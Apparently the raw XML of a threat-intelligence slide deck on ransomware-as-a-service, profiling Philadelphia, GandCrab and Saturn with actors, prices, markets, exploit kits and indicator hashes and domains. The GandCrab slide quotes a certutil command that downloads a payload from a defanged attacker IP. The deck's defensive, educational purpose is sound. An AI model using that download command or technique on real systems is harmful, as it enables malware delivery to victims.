              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Underground Russian Forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Exploit kit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Magnitude, RIG, Sundown, Neutrino, Magnitude, Nuclear. (ANGLER too but not anymore)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>IOC’s: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1600" dirty="0"/>
              <a:t>yv4msi53p.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1600" dirty="0"/>
              <a:t>770586df7c724b4432441c4183522348</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1600" dirty="0"/>
              <a:t>snfE021.tmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1600" dirty="0"/>
              <a:t>648D72BD7E511B1DD68F88A8EAF38E</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>sedwrfaawsa4.xyz</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859008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CCD43-27E2-4D5D-8853-4F44B281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Philadelphia</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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5E28D-5A0A-4196-B766-0B898DECA0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1600" b="1" dirty="0"/>
              <a:t>Threat actor:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> the rainmaker  and others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Characteristics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>User can edit the in four available options: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Do not ask for admin privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Ask and insist until it is given</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Ask but run anyway even if it is not given</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Ask and give up if it is not given. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Mercy button. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Bridges functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1600" dirty="0"/>
              <a:t>AES-256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1600" dirty="0" err="1"/>
              <a:t>encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Price</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: $400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Market</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Alphabay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> market (currently down)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Exploit kit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> sundown-pirate and RIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR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FDDE6D-0DE2-4FBD-8B4F-557D6D941B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48154" y="1825625"/>
            <a:ext cx="4829692" cy="39592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5F0A84-F857-4504-950A-A54010B6E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312" y="1546225"/>
            <a:ext cx="4905375" cy="42386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85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A773-A886-444C-8963-FDC781F5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Gangrab</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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5E303-B43C-4E94-8122-E0015DF45E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6920" y="1690688"/>
            <a:ext cx="6131560" cy="3996055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Threat Actor:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>kdabjnrg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>GandCrab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>developer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Characteristics: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> AES-256 (CBC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>) + RSA-2048 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>keys</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Unprotected RDP configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>certutil.exe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1000" dirty="0"/>
              <a:t>certutil.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1000" dirty="0" err="1"/>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1000" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1000" dirty="0" err="1"/>
              <a:t>split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1000" dirty="0"/>
              <a:t> -f hxxp://185.189.58[.]222/bam.exe C:\Users\ADMINI~1\AppData\Local\Temp\FVAacW.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:endParaRPr lang="es-CR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Price:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Market:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> Underground forums including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>RuNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Exploit Kit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> RIG and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0" err="1"/>
              <a:t>GrandSoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>IOC’s:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>hxxp://gdcbghvjyqy7jclk.onion.top/{USERID}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>hxxtp://gdcbghvjyqy7jclk.onion.casa/{USERID}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>2004a4b1272bdaa89585ab02057482fb702806578bd00ff442c67b510c6b1926</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" sz="1200" dirty="0"/>
              <a:t>4aee5f0682a53fd87d05adb69c3d34ede3cbd5251de59e25b140afd247e35b01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CR" sz="1200" dirty="0"/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B5411F05-A6AA-44DD-9EAA-C6608AEE44F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0340" y="1963635"/>
            <a:ext cx="5181600" cy="320367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2273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8A69C-C3F2-40F0-9E32-23ABD30F8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Saturn</a:t>
            </a:r>
            <a:endParaRPr lang="es-C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BFD2C-A6DB-4B33-9980-10C68F140E5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/>
              <a:t>Threat Actor:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Characteristics: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AES encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same model as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cerber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 30/70</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Antisandoxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> feature  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Payment can be send to xxxx:su34pwhpcafeiztt.onion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Price:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Market: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Exploit Kit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IOC’s:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>0622fcb172773d8939b451c43902095b0f91877ae05e562c60d0ca0c237a2e9c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-CR" dirty="0"/>
              <a:t>9e87f069de22ceac029a4ac56e6305d2df54227e6b0f0b3ecad52a01fbade021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-CR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37AB46-3BFD-43AF-85D5-CAD104EA93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88785" y="1920240"/>
            <a:ext cx="4825038" cy="28403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771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7EE5DC060BFB4693166C34DE158074" ma:contentTypeVersion="" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="4737936e6fe60e7db6b1549ba0eef902">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="ee0bf87b-0f6a-4fe2-a683-fdac9f59f104" xmlns:ns3="446adeaa-b212-4c7d-a3fe-99fbe9f5584a" xmlns:ns4="731f3dac-09f7-4c0e-91df-451a619a388d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="67d2f10c465972e52b6c2c6b94f6b264" ns2:_="" ns3:_="" ns4:_="">
    <xsd:import namespace="ee0bf87b-0f6a-4fe2-a683-fdac9f59f104"/>
    <xsd:import namespace="446adeaa-b212-4c7d-a3fe-99fbe9f5584a"/>
    <xsd:import namespace="731f3dac-09f7-4c0e-91df-451a619a388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3:SharedWithDetails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0bf87b-0f6a-4fe2-a683-fdac9f59f10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6adeaa-b212-4c7d-a3fe-99fbe9f5584a" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SharedWithDetails" ma:index="10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1f3dac-09f7-4c0e-91df-451a619a388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E13ADAF-E4E6-4DF7-A13D-085D4B93B78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3DD14EA-78A8-4942-A989-B4DB03097E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e0bf87b-0f6a-4fe2-a683-fdac9f59f104"/>
    <ds:schemaRef ds:uri="446adeaa-b212-4c7d-a3fe-99fbe9f5584a"/>
    <ds:schemaRef ds:uri="731f3dac-09f7-4c0e-91df-451a619a38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A0B0EFB-456C-4ADD-98D5-AE3E73C7FB8E}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="446adeaa-b212-4c7d-a3fe-99fbe9f5584a"/>
    <ds:schemaRef ds:uri="731f3dac-09f7-4c0e-91df-451a619a388d"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="ee0bf87b-0f6a-4fe2-a683-fdac9f59f104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2386</TotalTime>
  <Words>867</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>264</Paragraphs>
  <Slides>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Ransomware as a Service Evolution</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>Timeline</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stampado</vt:lpstr>
      <vt:lpstr>Cerber</vt:lpstr>
      <vt:lpstr>Philadelphia</vt:lpstr>
      <vt:lpstr>Gangrab</vt:lpstr>
      <vt:lpstr>Saturn</vt:lpstr>
      <vt:lpstr>Data keeper</vt:lpstr>
      <vt:lpstr>Stuff I found nice or interesting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Enterprise</vt:lpstr>
      <vt:lpstr>Tools for end users (Free and paid)</vt:lpstr>
      <vt:lpstr>Latch ARW</vt:lpstr>
      <vt:lpstr>Cath me if you can! </vt:lpstr>
      <vt:lpstr>Specials thanks to:</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Contact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Traci Wei</dc:creator>
  <cp:lastModifiedBy>Sue</cp:lastModifiedBy>
  <cp:revision>270</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-06T20:31:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-09T21:10:19Z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0x010100417EE5DC060BFB4693166C34DE158074</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>